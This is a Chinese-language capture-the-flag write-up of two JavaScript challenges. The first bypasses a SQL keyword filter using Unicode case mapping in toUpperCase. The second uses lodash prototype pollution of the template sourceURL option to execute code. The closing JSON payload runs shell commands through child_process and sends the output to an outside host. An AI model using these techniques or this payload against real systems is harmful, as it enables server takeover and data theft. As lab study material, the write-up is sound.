Code-Breaking JS

题目来自 “代码审计知识星球”( p 师傅 )
 学习  了  一下,做了两道关于 JS 的题

easy - nodechr

safeKeyword 过滤函数:

1
2
3
4
5
6
7
function safeKeyword(keyword) {
if(isString(keyword) && !keyword.match(/(union|select|;|\-\-)/is)) {
return keyword
}

return undefined
}

union|select|;|-- 进行了检测

 漏洞点:

1
let user = await ctx.db.get(`SELECT * FROM "users" WHERE "username" = '${username.toUpperCase()}' AND "password" = '${password.toUpperCase()}'`)

函数 toUpperCase 是存在一些特殊情况的:

1
2
3
4
"ı".toUpperCase()
"I"
"ſ".toUpperCase()
"S"

即可绕过过滤函数。

hard - thejs

代码比较少,使用 lodash 实现了一个简单的 ejs 模版引擎,在请求的时候渲染。猜测是 merge 有问题,查看版本,然后在 github 上搜索:
15431599099637

发现一个有意思的。
增加一个 safeGet 函数:

1
2
3
4
5
function safeGet(object, key) {
return key == '__proto__'
? undefined
: object[key];
}

增加了判断原型属性的函数,没有的话可以进行原型污染。
开始看到:

1
2
3
4
res.render('index', {
language: data.language,
category: data.category
})

想着原型污染有点不太可能,后来测试发现,merge 直接将注入的原型属性的值写到了最底层的 Object ,这样每创建一个对象,注入的对象都会在原型属性当中。
接下来寻找可以利用的点,查看 template 函数,发现敏感的点

1
2
3
4
var result = attempt(function() {
return Function(importsKeys, sourceURL + 'return ' + source)
.apply(undefined, importsValues);
});

继续找 可控点

1
var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';

其中 option 为我们在模版引擎中,渲染的值。这里读取其中的 sourceURL 属性的值,我们就可以通过原型污染,添加一个 sourceURL 属性并控制值,在拼接到 Function 中达到执行 JS 的目的。
模版:

1
new Function("","//# sourceURL='xxx'\r\n[CODE]\r\n")();

这里有个小 TIP ?:
-w716
没法直接在 Function 中引入 require。查了一下:

1
var require = global.require || global.process.mainModule.constructor._load

所以原型污染 + 执行任意 JS。
payload:

1
{"__proto__":{"sourceURL":"xxx\r\nvar require = global.require || global.process.mainModule.constructor._load;var result = require('child_process').execSync('cat /flag_thepr0t0js').toString();var req = require('http').request(`http://l0ca1.com/${result}`);req.end();\r\n"}}